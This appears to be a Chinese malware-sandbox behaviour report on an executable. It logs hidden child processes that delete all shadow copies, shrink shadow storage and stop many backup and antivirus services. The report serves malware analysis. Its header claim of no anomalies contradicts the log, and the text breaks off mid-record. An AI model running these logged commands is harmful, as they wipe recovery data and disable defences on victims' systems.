5.2
中危
该样本未表现出任何异常!
重新分析
更多

1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24

42e106fd843b0e3585057c30424f695a.exe

分析耗时

95s

最近分析

文件大小

101.0KB
静态报毒 动态报毒
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
未检测 暂无反病毒引擎检测结果
静态指标
Queries for the computername (28 个事件)
Time & API Arguments Status Return Repeated
1619396140.045501
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396140.045501
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396142.342001
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396142.358001
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396143.311876
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396143.311876
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396143.920251
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396143.920251
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396144.514626
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396144.514626
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396145.186876
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396145.186876
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396145.874374
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396145.874374
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396149.467751
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396149.467751
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396150.045876
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396150.045876
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396150.874001
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396150.874001
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396151.483374
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396151.483374
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396152.061499
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396152.061499
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396152.670251
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396152.670251
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396153.264251
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396153.264251
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Command line console output was observed (50 out of 108 个事件)
Time & API Arguments Status Return Repeated
1619396138.905501
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396140.045501
WriteConsoleW
buffer: 错误: 意外故障: 没有注册类
console_handle: 0x00000007
success 1 0
1619396142.311001
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396142.358001
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396142.358001
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396143.280876
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396143.311876
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396143.311876
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396143.889251
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396143.920251
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396143.920251
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396144.483626
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396144.514626
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396144.514626
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396145.155876
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396145.186876
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396145.186876
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396145.842374
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396145.874374
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396145.874374
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396149.436751
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396149.467751
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396149.467751
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396150.014876
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396150.045876
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396150.045876
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396150.842001
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396150.874001
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396150.874001
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396151.452374
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396151.483374
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396151.483374
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396152.030499
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396152.061499
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396152.061499
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396152.639251
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396152.670251
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396152.670251
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396153.249251
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396153.264251
WriteConsoleW
buffer: 错误: 意外故障: 没有注册类
console_handle: 0x00000007
success 1 0
1619396158.999001
WriteConsoleW
buffer: 服务名无效。
console_handle: 0x0000000b
success 1 0
1619396158.999001
WriteConsoleW
buffer: 请键入 NET HELPMSG 2185 以获得更多的帮助。
console_handle: 0x0000000b
success 1 0
1619396159.764499
WriteConsoleW
buffer: 服务名无效。
console_handle: 0x0000000b
success 1 0
1619396159.764499
WriteConsoleW
buffer: 请键入 NET HELPMSG 2185 以获得更多的帮助。
console_handle: 0x0000000b
success 1 0
1619396160.561751
WriteConsoleW
buffer: 服务名无效。
console_handle: 0x0000000b
success 1 0
1619396160.561751
WriteConsoleW
buffer: 请键入 NET HELPMSG 2185 以获得更多的帮助。
console_handle: 0x0000000b
success 1 0
1619396161.342001
WriteConsoleW
buffer: 服务名无效。
console_handle: 0x0000000b
success 1 0
1619396161.342001
WriteConsoleW
buffer: 请键入 NET HELPMSG 2185 以获得更多的帮助。
console_handle: 0x0000000b
success 1 0
1619396162.124251
WriteConsoleW
buffer: 服务名无效。
console_handle: 0x0000000b
success 1 0
1619396162.139251
WriteConsoleW
buffer: 请键入 NET HELPMSG 2185 以获得更多的帮助。
console_handle: 0x0000000b
success 1 0
行为判定
动态指标
Creates a suspicious process (47 个事件)
cmdline cmd.exe /c net stop EPSecurityService /y
cmdline cmd.exe /c net stop BackupExecAgentBrowser /y
cmdline cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
cmdline cmd.exe /c net stop FA_Scheduler /y
cmdline cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
cmdline cmd.exe /c net stop BackupExecVSSProvider /y
cmdline cmd.exe /c net stop AcronisAgent /y
cmdline cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
cmdline cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
cmdline cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
cmdline cmd.exe /c net stop "SQLsafe Backup Service" /y
cmdline cmd.exe /c net stop "SQLsafe Filter Service" /y
cmdline cmd.exe /c net stop BackupExecManagementService /y
cmdline cmd.exe /c net stop McShield /y
cmdline cmd.exe /c net stop Antivirus /y
cmdline cmd.exe /c net stop "Enterprise Client Service" /y
cmdline cmd.exe /c net stop BackupExecRPCService /y
cmdline cmd.exe /c net stop BackupExecDeviceMediaService /y
cmdline cmd.exe /c net stop mfemms /y
cmdline cmd.exe /c net stop McTaskManager /y
cmdline cmd.exe /c net stop mozyprobackup /y
cmdline cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
cmdline cmd.exe /c net stop MsDtsServer /y
cmdline cmd.exe /c net stop AcrSch2Svc /y
cmdline cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
cmdline cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
cmdline cmd.exe /c net stop "Acronis VSS Provider" /y
cmdline cmd.exe /c net stop DCAgent /y
cmdline cmd.exe /c net stop EsgShKernel /y
cmdline cmd.exe /c net stop ARSM /y
cmdline cmd.exe /c net stop MMS /y
cmdline cmd.exe /c net stop IMAP4Svc /y
cmdline cmd.exe /c net stop EraserSvc11710 /y
cmdline cmd.exe /c net stop bedbg /y
cmdline cmd.exe /c net stop IISAdmin /y
cmdline cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
cmdline cmd.exe /c net stop BackupExecJobEngine /y
cmdline cmd.exe /c net stop MsDtsServer100 /y
cmdline cmd.exe /c net stop mfevtp /y
cmdline cmd.exe /c net stop "Veeam Backup Catalog Data Service" /y
cmdline cmd.exe /c net stop MsDtsServer110 /y
cmdline cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
cmdline cmd.exe /c net stop BackupExecAgentAccelerator /y
cmdline cmd.exe /c net stop EPUpdateService /y
cmdline cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
cmdline cmd.exe /c vssadmin Delete Shadows /all /quiet
cmdline cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
A process created a hidden window (48 个事件)
Time & API Arguments Status Return Repeated
1619396138.342126
CreateProcessInternalW
thread_identifier: 1272
thread_handle: 0x000000d4
process_identifier: 1760
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin Delete Shadows /all /quiet
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396141.999126
CreateProcessInternalW
thread_identifier: 2308
thread_handle: 0x000000d8
process_identifier: 2976
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396142.905126
CreateProcessInternalW
thread_identifier: 2956
thread_handle: 0x000000d4
process_identifier: 2940
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396143.499126
CreateProcessInternalW
thread_identifier: 3148
thread_handle: 0x000000d8
process_identifier: 3144
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396144.108126
CreateProcessInternalW
thread_identifier: 3316
thread_handle: 0x000000d4
process_identifier: 3312
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396144.733126
CreateProcessInternalW
thread_identifier: 3492
thread_handle: 0x000000d8
process_identifier: 3488
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396145.436126
CreateProcessInternalW
thread_identifier: 3660
thread_handle: 0x000000d4
process_identifier: 3656
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396146.061126
CreateProcessInternalW
thread_identifier: 3832
thread_handle: 0x000000d8
process_identifier: 3828
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396149.670126
CreateProcessInternalW
thread_identifier: 4020
thread_handle: 0x000000d4
process_identifier: 4016
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396150.249126
CreateProcessInternalW
thread_identifier: 3176
thread_handle: 0x000000d8
process_identifier: 3172
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396151.077126
CreateProcessInternalW
thread_identifier: 3400
thread_handle: 0x000000d4
process_identifier: 3404
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396151.670126
CreateProcessInternalW
thread_identifier: 3644
thread_handle: 0x000000d8
process_identifier: 3584
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396152.264126
CreateProcessInternalW
thread_identifier: 3812
thread_handle: 0x000000d4
process_identifier: 3816
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396152.874126
CreateProcessInternalW
thread_identifier: 3896
thread_handle: 0x000000d8
process_identifier: 4012
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin Delete Shadows /all /quiet
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396155.764126
CreateProcessInternalW
thread_identifier: 3448
thread_handle: 0x000000d4
process_identifier: 3432
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop "Acronis VSS Provider" /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396159.233126
CreateProcessInternalW
thread_identifier: 3916
thread_handle: 0x000000d8
process_identifier: 2796
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop "Enterprise Client Service" /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396159.999126
CreateProcessInternalW
thread_identifier: 2168
thread_handle: 0x000000d4
process_identifier: 3348
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop "SQLsafe Backup Service" /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396160.795126
CreateProcessInternalW
thread_identifier: 2988
thread_handle: 0x000000d8
process_identifier: 3084
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop "SQLsafe Filter Service" /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396161.608126
CreateProcessInternalW
thread_identifier: 3676
thread_handle: 0x000000d4
process_identifier: 2168
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop "Veeam Backup Catalog Data Service" /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396162.358126
CreateProcessInternalW
thread_identifier: 4084
thread_handle: 0x000000d8
process_identifier: 1344
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop AcronisAgent /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396163.108126
CreateProcessInternalW
thread_identifier: 4212
thread_handle: 0x000000d4
process_identifier: 4208
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop AcrSch2Svc /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396163.905126
CreateProcessInternalW
thread_identifier: 4428
thread_handle: 0x000000d8
process_identifier: 4424
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop Antivirus /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396167.155126
CreateProcessInternalW
thread_identifier: 4652
thread_handle: 0x000000d4
process_identifier: 4648
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop ARSM /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396168.999126
CreateProcessInternalW
thread_identifier: 4872
thread_handle: 0x000000d8
process_identifier: 4868
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop BackupExecAgentAccelerator /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396170.155126
CreateProcessInternalW
thread_identifier: 5096
thread_handle: 0x000000d4
process_identifier: 5092
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop BackupExecAgentBrowser /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396172.514126
CreateProcessInternalW
thread_identifier: 4388
thread_handle: 0x000000d8
process_identifier: 4384
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop BackupExecDeviceMediaService /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396175.108126
CreateProcessInternalW
thread_identifier: 4428
thread_handle: 0x000000d4
process_identifier: 4644
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop BackupExecJobEngine /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396175.874126
CreateProcessInternalW
thread_identifier: 4992
thread_handle: 0x000000d8
process_identifier: 4988
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop BackupExecManagementService /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396176.749126
CreateProcessInternalW
thread_identifier: 3588
thread_handle: 0x000000d4
process_identifier: 4336
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop BackupExecRPCService /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396178.264126
CreateProcessInternalW
thread_identifier: 4680
thread_handle: 0x000000d8
process_identifier: 4468
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop BackupExecVSSProvider /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396183.655126
CreateProcessInternalW
thread_identifier: 4248
thread_handle: 0x000000d4
process_identifier: 4296
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop bedbg /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396184.420126
CreateProcessInternalW
thread_identifier: 4752
thread_handle: 0x000000d8
process_identifier: 4820
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop DCAgent /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396185.233126
CreateProcessInternalW
thread_identifier: 1500
thread_handle: 0x000000d4
process_identifier: 1416
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop EPSecurityService /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396186.186126
CreateProcessInternalW
thread_identifier: 4428
thread_handle: 0x000000d8
process_identifier: 4976
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop EPUpdateService /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396187.014126
CreateProcessInternalW
thread_identifier: 4156
thread_handle: 0x000000d4
process_identifier: 5004
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop EraserSvc11710 /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396188.639126
CreateProcessInternalW
thread_identifier: 2212
thread_handle: 0x000000d8
process_identifier: 4108
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop EsgShKernel /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396189.420126
CreateProcessInternalW
thread_identifier: 5260
thread_handle: 0x000000d4
process_identifier: 5256
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop FA_Scheduler /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396190.702126
CreateProcessInternalW
thread_identifier: 5480
thread_handle: 0x000000d8
process_identifier: 5476
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop IISAdmin /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396191.530126
CreateProcessInternalW
thread_identifier: 5720
thread_handle: 0x000000d4
process_identifier: 5716
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop IMAP4Svc /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396192.311126
CreateProcessInternalW
thread_identifier: 5948
thread_handle: 0x000000d8
process_identifier: 5944
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop McShield /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396193.061126
CreateProcessInternalW
thread_identifier: 5356
thread_handle: 0x000000d4
process_identifier: 5448
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop McTaskManager /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396193.842126
CreateProcessInternalW
thread_identifier: 5784
thread_handle: 0x000000d8
process_identifier: 5788
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop mfemms /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396194.608126
CreateProcessInternalW
thread_identifier: 5144
thread_handle: 0x000000d4
process_identifier: 5864
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop mfevtp /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396195.670126
CreateProcessInternalW
thread_identifier: 5588
thread_handle: 0x000000d8
process_identifier: 5552
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop MMS /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396196.374126
CreateProcessInternalW
thread_identifier: 2368
thread_handle: 0x000000d4
process_identifier: 2480
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop mozyprobackup /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396197.186126
CreateProcessInternalW
thread_identifier: 6112
thread_handle: 0x000000d8
process_identifier: 6012
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop MsDtsServer /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396197.967126
CreateProcessInternalW
thread_identifier: 2368
thread_handle: 0x000000d4
process_identifier: 5460
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop MsDtsServer100 /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396198.827126
CreateProcessInternalW
thread_identifier: 6124
thread_handle: 0x000000d8
process_identifier: 5312
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop MsDtsServer110 /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
Checks for the Locally Unique Identifier on the system for a suspicious privilege (14 个事件)
Time & API Arguments Status Return Repeated
1619396138.905501
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396142.311001
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396143.264876
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396143.874251
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396144.467626
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396145.139876
LookupPrivilegeValueW
